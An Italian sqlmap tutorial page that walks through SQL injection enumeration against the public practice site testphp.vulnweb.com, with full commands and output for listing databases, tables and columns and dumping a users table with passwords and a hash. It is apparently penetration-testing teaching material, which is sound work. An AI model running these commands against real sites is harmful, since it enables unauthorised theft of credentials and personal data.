Enumerazione database con sqlmap

Vedremo ora qualche tecnica di enumerazione per estrarre informazioni utili dal database. Se volessimo estrarre maggiori informazioni sui servizi ai quale è connessa la nostra web application potremmo utilizzare le opzioni:

  • –banner
  • –fingerprint

Analogamente per ottenere la lista degli utenti e password:

  • –users
  • –passwords

Per verificare se l’utente è un amministratore:

--is-dba

NOTA – non sempre tutte queste informazione sono accessibili. Vedremo ora come estrarre passo dopo passo il contenuto del database. Si procede specificando l’opzione “–dbs” per ottenere la lista dei database disponibili:

user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql --dbs
...

[12:47:32] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS: MySQL 5.0 
[12:47:32] [INFO] fetching database names 
[12:47:32] [INFO] the SQL query used returns 3 entries 
[12:47:33] [INFO] retrieved: information_schema 
[12:47:33] [INFO] retrieved: acuart 
[12:47:33] [INFO] retrieved: modrewriteShop 
available databases [3]: 
[*] acuart 
[*] information_schema 
[*] modrewriteShop 

[12:47:33] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' 

[*] shutting down at: 12:47:33

Per enumerare le tabelle del database “acuart” sarà necessario aggiungere al precedente comando le opzioni “-D acuart –tables”:

user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart --tables
[...]

[12:48:46] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS: MySQL 5.0 
[12:48:46] [INFO] fetching tables for database 'acuart' 
[12:48:46] [INFO] the SQL query used returns 7 entries 
[12:48:46] [INFO] retrieved: acuart 
[12:48:47] [INFO] retrieved: artists 
[12:48:47] [INFO] retrieved: acuart 
[12:48:47] [INFO] retrieved: carts 
[12:48:47] [INFO] retrieved: acuart 
[12:48:47] [INFO] retrieved: categ 
[12:48:47] [INFO] retrieved: acuart 
[12:48:47] [INFO] retrieved: featured 
[12:48:48] [INFO] retrieved: acuart 
[12:48:48] [INFO] retrieved: guestbook 
[12:48:48] [INFO] retrieved: acuart 
[12:48:48] [INFO] retrieved: pictures 
[12:48:48] [INFO] retrieved: acuart 
[12:48:48] [INFO] retrieved: users 
Database: acuart 
[7 tables] 
+-----------+ 
| artists   | 
| carts     | 
| categ     | 
| featured  | 
| guestbook | 
| pictures  | 
| users     | 
+-----------+ 

[12:48:48] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' 

[*] shutting down at: 12:48:48

Ora è possibile ottenere il listato delle colonne con l’opzione “–columns”:

user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --columns
[...]

[12:49:27] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS: MySQL 5.0 
[12:49:27] [INFO] fetching columns for table 'users' on database 'acuart' 
[12:49:27] [INFO] the SQL query used returns 8 entries 
[12:49:28] [INFO] retrieved: uname 
[12:49:28] [INFO] retrieved: varchar(100) 
[12:49:28] [INFO] retrieved: pass 
[12:49:28] [INFO] retrieved: varchar(100) 
[12:49:28] [INFO] retrieved: cc 
[12:49:28] [INFO] retrieved: varchar(100) 
[12:49:28] [INFO] retrieved: address 
[12:49:29] [INFO] retrieved: mediumtext 
[12:49:29] [INFO] retrieved: email 
[12:49:29] [INFO] retrieved: varchar(100) 
[12:49:29] [INFO] retrieved: name 
[12:49:29] [INFO] retrieved: varchar(100) 
[12:49:29] [INFO] retrieved: phone 
[12:49:29] [INFO] retrieved: varchar(100) 
[12:49:30] [INFO] retrieved: cart 
[12:49:30] [INFO] retrieved: varchar(100) 
Database: acuart 
Table: users 
[8 columns] 
+---------+--------------+ 
| Column  | Type         | 
+---------+--------------+ 
| address | mediumtext   | 
| cart    | varchar(100) | 
| cc      | varchar(100) | 
| email   | varchar(100) | 
| name    | varchar(100) | 
| pass    | varchar(100) | 
| phone   | varchar(100) | 
| uname   | varchar(100) | 
+---------+--------------+ 

[12:49:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' 

[*] shutting down at: 12:49:30

Infine recupereremo il contenuto del database limitandoci alle prime due tuple con l’opzione “–dump –start 1 –stop 3” :

user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --dump --start 1 --stop 5
[...]

[12:59:19] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS: MySQL 5.0 
[12:59:19] [INFO] fetching columns for table 'users' on database 'acuart' 
[12:59:19] [INFO] the SQL query used returns 8 entries 
[12:59:20] [INFO] retrieved: uname 
[12:59:20] [INFO] retrieved: varchar(100) 
[12:59:20] [INFO] retrieved: pass 
[12:59:20] [INFO] retrieved: varchar(100) 
[12:59:20] [INFO] retrieved: cc 
[12:59:20] [INFO] retrieved: varchar(100) 
[12:59:20] [INFO] retrieved: address 
[12:59:21] [INFO] retrieved: mediumtext 
[12:59:21] [INFO] retrieved: email 
[12:59:21] [INFO] retrieved: varchar(100) 
[12:59:21] [INFO] retrieved: name 
[12:59:21] [INFO] retrieved: varchar(100) 
[12:59:21] [INFO] retrieved: phone 
[12:59:21] [INFO] retrieved: varchar(100) 
[12:59:22] [INFO] retrieved: cart 
[12:59:22] [INFO] retrieved: varchar(100) 
[12:59:22] [INFO] fetching entries for table 'users' on database 'acuart' 
[12:59:22] [INFO] retrieved: cacucko 
[12:59:22] [INFO] retrieved: cacucko 
[12:59:22] [INFO] retrieved: cacucko 
[12:59:22] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa 
[12:59:23] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: hacked by cacucko! 
[12:59:23] [INFO] retrieved: Russian hackers! 
[12:59:23] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: gopala 
[12:59:24] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa 
[12:59:24] [INFO] retrieved: test 
[12:59:24] [INFO] retrieved: gopala 
[12:59:24] [INFO] retrieved: gopala 
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n 
Database: acuart 
Table: users 
[2 entries] 
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ 
| address            | cart                             | cc      | email            | name    | pass   | phone   | uname  | 
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ 
| hacked by cacucko! | 1b90caf669e05660efdf1d23b48100fa | cacucko | Russian hackers! | cacucko | gopala | cacucko | gopala | 
| gopala             | 1b90caf669e05660efdf1d23b48100fa | gopala  | gopala           | gopala  | gopala | gopala  | test   | 
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ 

[12:59:30] [INFO] Table 'acuart.users' dumped to CSV file '/home/user/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv' 
[12:59:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' 

[*] shutting down at: 12:59:30
5 / 6

Tampering con sqlmap